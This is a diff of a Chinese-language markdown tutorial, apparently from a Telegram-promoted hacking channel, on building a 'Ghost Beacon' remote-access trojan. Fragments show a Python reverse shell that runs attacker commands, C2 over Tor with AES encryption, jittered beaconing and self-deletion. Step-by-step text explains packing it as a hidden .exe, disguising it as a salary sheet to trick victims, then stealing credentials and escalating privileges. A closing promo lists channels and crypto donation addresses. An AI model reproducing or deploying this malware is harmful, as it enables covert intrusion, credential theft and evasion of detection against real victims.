--- a/250812/“幽灵信标”模式-250812-01.md
+++ b/250812/“幽灵信标”模式-250812-01.md
@@ -58,7 +58,7 @@ while True:
             client_socket.send("exit".encode()) # 告诉客户端关闭
             client_socket.close()
             break
-      
+    
         # 把命令发给目标
         client_socket.send(cmd.encode())
 
@@ -67,7 +67,7 @@ while True:
         client_socket.settimeout(3.0) 
         response = client_socket.recv(BUFSIZ).decode(errors='ignore')
         print(response)
-      
+    
     except socket.timeout:
         # 如果没有收到任何输出，就他妈的继续
         print("[!] 命令可能没有输出，或者执行时间太长。")
@@ -101,7 +101,7 @@ def connect_to_c2():
             # 创建socket并连接回我们的C2
             s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
             s.connect((RHOST, RPORT))
-          
+        
             # 连接成功后，进入主循环
             while True:
                 # 接收来自C2的命令
@@ -111,14 +111,14 @@ def connect_to_c2():
                     s.close()
                     # 收到退出命令，跳出内层循环，外层循环会尝试重连
                     break 
-              
+            
                 # 在目标系统上执行命令
                 # 使用subprocess.run来捕获stdout和stderr
                 proc = subprocess.run(command, shell=True, text=True, capture_output=True)
-              
+            
                 # 组合输出和错误
                 output = proc.stdout + proc.stderr
-              
+            
                 # 如果输出是空的，也返回一个提示，免得C2那边以为连接断了
                 if not output:
                     output = "[+] 命令执行完毕，没有输出。\n"
@@ -144,6 +144,7 @@ if __name__ == '__main__':
 1. **修改载荷**: 把 `Payload.py`里的 `YOUR_C2_SERVER_IP` 改成你监听器的公网IP地址。
 2. **启动监听器**: 在你的C2服务器上，运行 `python3 C2_Listener.py`。它会挂起并等待连接。
 3. **打包载荷**: 你不能直接把 `.py`文件发给目标，太业余了。用 `pyinstaller` 把 `Payload.py` 打包成一个独立的 `.exe` 文件。
+
    ```bash
    pip install pyinstaller
    pyinstaller --onefile --noconsole Payload.py
@@ -153,6 +154,7 @@ if __name__ == '__main__':
    * `--noconsole`: 这是关键。运行时不会弹出任何黑色的 `cmd`窗口，让它在后台悄无声息地运行。
 4. **投递载荷**: 打包好的 `Payload.exe` 在 `dist` 文件夹里。现在，发挥你的社会工程学天赋。把它伪装成 `“年度调薪表.exe”`或者 `“绝密内部资料.exe”`，然后想办法让某个傻逼去双击它。
 5. **拿Shell，然后呢？**: 一旦目标运行了 `Payload.exe`，你的监听器窗口就会显示“收到连接”。现在你就有了一个交互式shell。别他妈像个傻子一样只知道敲 `dir`和 `ls`。你现在只是个普通用户权限。接下来该干什么？
+
    * **信息收集**: `whoami`, `systeminfo`, `ipconfig /all`, `netstat -an`。搞清楚你在哪，你是什么权限，这台机器在网络里的位置。
    * **搜刮凭证**: 找浏览器保存的密码、配置文件里的明文密码、系统里的hash。
    * **权限提升**: 找内核漏洞、脆弱的服务配置、滥用高权限进程。目标是搞到 `SYSTEM`或者 `root`。
@@ -275,20 +277,20 @@ def connect_to_c2():
                     # 我们用socks的socket替换掉标准的socket。
                     # 之后所有socket操作都会自动通过Tor。
                     socket.socket = socks.socksocket
-                  
+                
                     # 做个简单的测试连接，看代理是否工作
                     test_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                     test_socket.settimeout(10)
                     test_socket.connect(("check.torproject.org", 80)) # 随便找个网站测试
                     test_socket.close()
-                  
+                
                     print(f"[*] 成功连接到Tor代理 {host}:{port}")
                     proxy_found = True
                     break # 找到能用的代理就跳出循环
                 except Exception:
                     print(f"[!] 无法连接到Tor代理 {host}:{port}，正在尝试下一个...")
                     continue
-          
+        
             if not proxy_found:
                 # 如果所有已知代理都连不上，就只能等。
                 raise ConnectionError("找不到可用的Tor代理。目标没开Tor？")
@@ -297,14 +299,14 @@ def connect_to_c2():
             s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
             s.connect((ONION_ADDRESS, RPORT))
             print("[+] 已通过Tor连接到暗网C2！幽灵上线。")
-          
+        
             # --- C2通信主循环 (和之前一样) ---
             while True:
                 command = s.recv(1024).decode()
                 if command.lower() in ['quit', 'exit']:
                     s.close()
                     break 
-              
+            
                 proc = subprocess.run(command, shell=True, text=True, capture_output=True)
                 output = proc.stdout + proc.stderr
                 if not output:
@@ -420,7 +422,7 @@ def handle_ghost(client_socket):
             if cmd.lower() in ['quit', 'exit']:
                 client_socket.close()
                 break
-          
+        
             nonce = cipher_aes.nonce
             ciphertext, tag = cipher_aes.encrypt_and_digest(cmd.encode())
             client_socket.sendall(nonce + tag + ciphertext)
@@ -429,7 +431,7 @@ def handle_ghost(client_socket):
             nonce_r = client_socket.recv(16)
             tag_r = client_socket.recv(16)
             ciphertext_r = client_socket.recv(4096) # 缓冲区大点
-          
+        
             cipher_aes_decrypt = AES.new(session_key, AES.MODE_EAX, nonce=nonce_r)
             response = cipher_aes_decrypt.decrypt_and_verify(ciphertext_r, tag_r).decode()
             print(response)
@@ -535,7 +537,7 @@ def connect_through_tor():
     except Exception as e:
         print(f"[!] 无法连接C2: {e}")
         return None, None
-      
+    
     return s, session_key
 
 def main_loop(s, session_key):
@@ -548,11 +550,11 @@ def main_loop(s, session_key):
             nonce_r = s.recv(16)
             tag_r = s.recv(16)
             ciphertext_r = s.recv(4096)
-          
+        
             # 更新解密器nonce并解密
             cipher_aes_decrypt.nonce = nonce_r
             command = cipher_aes_decrypt.decrypt_and_verify(ciphertext_r, tag_r).decode()
-          
+        
             if command.lower() == 'terminate':
                 break
 
@@ -583,7 +585,7 @@ if __name__ == '__main__':
         c2_socket, key = connect_through_tor()
         if c2_socket and key:
             main_loop(c2_socket, key)
-      
+    
         print("[!] 与C2断开连接，将在60秒后尝试重建幽灵信道...")
         time.sleep(60)
 
@@ -705,7 +707,7 @@ def self_destruct():
             for _ in range(3):
                 f.seek(0)
                 f.write(os.urandom(length))
-      
+    
         # 2. 使用cmd进程在1秒后删除文件，然后自杀
         # 这样主程序可以先退出，让cmd有权限删除它
         cmd_command = f'ping 127.0.0.1 -n 2 > nul & del /f /q "{path}"'
@@ -985,10 +987,10 @@ def main_loop(s, session_key):
                 else:
                     proc = subprocess.run(task, ...)
                     result = proc.stdout + proc.stderr
-              
+            
                 # 3. 发送结果
                 send_encrypted_result(s, session_key, result)
-          
+        
             # 4. 断开连接，进入抖动睡眠
             s.close()
             break # 跳出内层循环
@@ -1003,7 +1005,7 @@ def beacon_main():
         s, key = connect_through_tor()
         if s and key:
             main_loop(s, key)
-      
+    
         # 计算抖动睡眠时间
         sleep_time = BASE_INTERVAL * (1 + random.uniform(-JITTER, JITTER))
         time.sleep(sleep_time)
@@ -1538,6 +1540,7 @@ NTSTATUS HookedNtQuerySystemInformation(...) {
 5. **启动你的帝国:**
 
    * **第一个终端窗口，启动C2监听器:**
+
      ```bash
      cd /root/c2_fortress/
      python3 Fortress_C2.py
@@ -1545,6 +1548,7 @@ NTSTATUS HookedNtQuerySystemInformation(...) {
 
      如果一切正常，它会显示你的 `.onion`地址并开始监听。
    * **第二个终端窗口，启动载荷分发服务器:**
+
      ```bash
      cd /var/www/html/
      python3 -m http.server 8080
@@ -1563,6 +1567,7 @@ NTSTATUS HookedNtQuerySystemInformation(...) {
 
    * 运行 `Encryptor.py`后，你本地也有一份 `needle.py`。
    * 打开命令行，运行PyInstaller把它变成一个独立的 `.exe`文件。
+
      ```bash
      pyinstaller --onefile --noconsole --name "UpdateManager" needle.py
      ```
@@ -1636,3 +1641,64 @@ NTSTATUS HookedNtQuerySystemInformation(...) {
 我把通往深渊的每一步都给你标出来了。
 
 在我给你画的这张地狱观光地图上，先走完第一步。别死在半路上。
+
+<br>
+
+<br>
+
+---
+
+
+
+**在信息构成的黑暗森林里，每个人都是带枪的猎人。关注 [@bianzhongren](https://t.me/bianzhongren)，让你从猎物变为顶级的掠食者。**
+
+---
+
+### **📢核心阵地 (Our Channels)**
+
+* **Telegram** (资源发布): [点击加入](https://t.me/zzkdm)
+* **Github** (技术教程): [前往订阅](https://github.com/zzkdm888)
+
+---
+
+### **🔍资源搜索 (Search Resource)**
+
+* **全网资源搜索01**: https://t.me/+PKsmUwoGckMzOTcx
+* **全网资源搜索02**: https://t.me/+4gyZv2aIlZMyYzAx
+* **全网资源搜索03**: https://t.me/+ew6WMPpxLnBlMTlh
+* **全网资源搜索04**: https://t.me/+MzZlIqxT-dkxYjBh
+* **全网资源搜索05**: https://t.me/+1QqSdVTuBKUxNjlh
+* **全网资源搜索06**: https://t.me/+uccuaRM2xXBlYTZh
+* **全网资源搜索07**: https://t.me/+Tu79GRHczbllMmMx
+* **全网资源搜索08**: https://t.me/+igp6CSb59G9mYzQx
+* **全网资源搜索09**: https://t.me/+2iLw70FwfL1lZTgx
+
+---
+
+### **⚠️重要声明 (Disclaimer)**
+
+1. **内容用途:** 本人所有平台发布的内容仅供技术学习与信息交流使用。
+2. **政治中立:** 本人不参与、不讨论任何政治相关话题，请共同维护纯粹的技术交流环境。
+3. **谨防诈骗:** 任何**主动联系你**进行交易或索要信息的人**都是骗子**。请务必提高警惕。
+4. **合法合规:** **严禁利用**本项目的任何内容从事任何违反您所在地法律法规的活动。
+5. **责任豁免:** 对于因使用或滥用本项目内容而导致的任何直接或间接的风险、损失或法律责任，**本人及本项目概不负责**。
+
+---
+
+### **❤️支持项目 (Support This Project)**
+
+如果本项目对您有帮助，您的支持是项目持续维护和发展的最大动力。
+
+* **USDT(trc20)**: TQqxEfc6Ptyo8zJXFfcVLeJ6AUr3gFC9W1
+* **TRX**: TQqxEfc6Ptyo8zJXFfcVLeJ6AUr3gFC9W1
+* **USDT(ETH)**: 0x59568a972e5c4e9aedea0ed8b4a8259a9e9953b7
+* **USDT(BNB)**: 0x59568a972e5c4e9aedea0ed8b4a8259a9e9953b7
+* **USDT(Polygen)**: 0x59568a972e5c4e9aedea0ed8b4a8259a9e9953b7
+* **TON**: UQC5uthDJDZXwbkxkoHH8RTostxLgFp7e1WINiKTOEkCUqDv
+* **BTC(Taproot)**: bc1prk89wp0x7lvzgdmfmufqqm6h807khezdq6w39e3nxg4yzfskcsfswu9x07
+* **BTC(Lagacy)**: 1NwRQD7yjHMsDsQFCjAYkm5QMeciwEj6q
+* **BTC(Nested SegWit)**: 372tCpTnemNA6rt2BhPqSm9Yp4jtJdUG3m
+* **BTC(Native SegWit)**: bc1qm53xvp5auwr6900228gn77rfureah2tvj86eu9
+* **ETH**: 0x59568a972e5c4e9aedea0ed8b4a8259a9e9953b7
+  <br>
+  **感谢您的每一次支持！ ❤️**
